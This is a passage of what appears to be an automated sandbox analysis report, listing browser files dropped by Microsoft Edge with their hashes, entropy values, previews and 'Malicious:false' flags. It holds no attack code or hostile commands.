                                                                                                                                                                                                                                                SHA-512:A6CEB61D826F6534C1DEB73C42BAD871039EE71A8F371CFF5FC718CF42942E69E24AA086CD562A3B7A300BDE8F2493352389A0DDD6C6EE28533CC171B0E0DBD1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.382 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/16-11:07:27.384 16e8 Recovering log #3.2024/12/16-11:07:27.385 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):782
                                                                                                                                                                                                                                                Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                                                                                Entropy (8bit):5.23502312094087
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/w+q2PcNwi23oH+TcwtfrzAdIFUt8O/U4XZmw+O/U43VkwOcNwi23oH+Tcwtfrm:7/1vLZYeb9FUt8O/U0/+O/U054ZYeb2J
                                                                                                                                                                                                                                                MD5:5D9D74E100428881E238DE865F287134
                                                                                                                                                                                                                                                SHA1:5689967E0515CC7575725542209BF9275AB3FD01
                                                                                                                                                                                                                                                SHA-256:5F3CF8FA6C12AB6E89D270895F4715C28CDE4A659860D2640FE64BA7B1BA4FB1
                                                                                                                                                                                                                                                SHA-512:2A1B2CFC321577528A79420568DCF08EEB61241EB4A36891625603A4D400D97C5690BC34E08D92565A7FAD2FCA29A4BAC548BC899E3F2A0CD111CEFAD5899AB8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.374 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/16-11:07:27.375 16e8 Recovering log #3.2024/12/16-11:07:27.375 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                                                                                Entropy (8bit):5.23502312094087
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/w+q2PcNwi23oH+TcwtfrzAdIFUt8O/U4XZmw+O/U43VkwOcNwi23oH+Tcwtfrm:7/1vLZYeb9FUt8O/U0/+O/U054ZYeb2J
                                                                                                                                                                                                                                                MD5:5D9D74E100428881E238DE865F287134
                                                                                                                                                                                                                                                SHA1:5689967E0515CC7575725542209BF9275AB3FD01
                                                                                                                                                                                                                                                SHA-256:5F3CF8FA6C12AB6E89D270895F4715C28CDE4A659860D2640FE64BA7B1BA4FB1
                                                                                                                                                                                                                                                SHA-512:2A1B2CFC321577528A79420568DCF08EEB61241EB4A36891625603A4D400D97C5690BC34E08D92565A7FAD2FCA29A4BAC548BC899E3F2A0CD111CEFAD5899AB8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.374 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/16-11:07:27.375 16e8 Recovering log #3.2024/12/16-11:07:27.375 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:117.0.2045.47

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF27507.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF27555.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2772a.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF29d8e.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2e630.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF387af.TMP (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                Category:dropped
